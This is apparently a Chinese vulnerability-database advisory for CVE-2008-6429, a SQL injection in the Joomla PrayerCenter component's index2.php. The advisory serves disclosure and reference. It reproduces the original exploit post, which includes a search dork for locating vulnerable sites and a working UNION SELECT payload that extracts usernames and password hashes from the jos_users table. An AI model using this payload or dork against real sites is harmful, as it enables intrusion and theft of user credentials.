mike_leeper PrayerCenter 'index2.php'SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115312 漏洞类型 SQL注入
发布时间 2008-05-31 更新时间 2008-05-31
CVE编号 CVE-2008-6429 CNNVD-ID CNNVD-200903-138
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/5708
https://www.securityfocus.com/bid/29463
https://cxsecurity.com/issue/WLB-2009030154
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-138
|漏洞详情
Joomla!PrayerCenter(com_prayercenter)组件1.4.9版本及其早期版本中存在SQL注入漏洞。远程攻击者可以借助对index2.php的一个view_request操作中的id参数,执行任意SQL指令。
|漏洞EXP
/---------------------------------------------------------------\
\                                				/
/      Joomla Component  prayercenter  Remote SQL injection     \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] Dork      :  inurl:"com_prayercenter"

[*] POC        : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id=-1 UNION SELECT user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

[*] Note       : Sometimes you need to register for doing this exploit
                
----------------------------------------------------------------------------
[*] Greetings :  Str0ke, all friends & muslims HaCkeRs...
[*] Greetings2 : http://www.palcastle.org/cc

# milw0rm.com [2008-05-31]
|受影响的产品
Mike Leeper PrayerCenter 1.4.9
|参考资料

来源:XF
名称:prayercenter-index2-sql-injection(42772)
链接:http://xforce.iss.net/xforce/xfdb/42772
来源:MILW0RM
名称:5708
链接:http://www.milw0rm.com/exploits/5708
来源:SECUNIA
名称:30493
链接:http://secunia.com/advisories/30493
来源:OSVDB
名称:45856
链接:http://osvdb.org/45856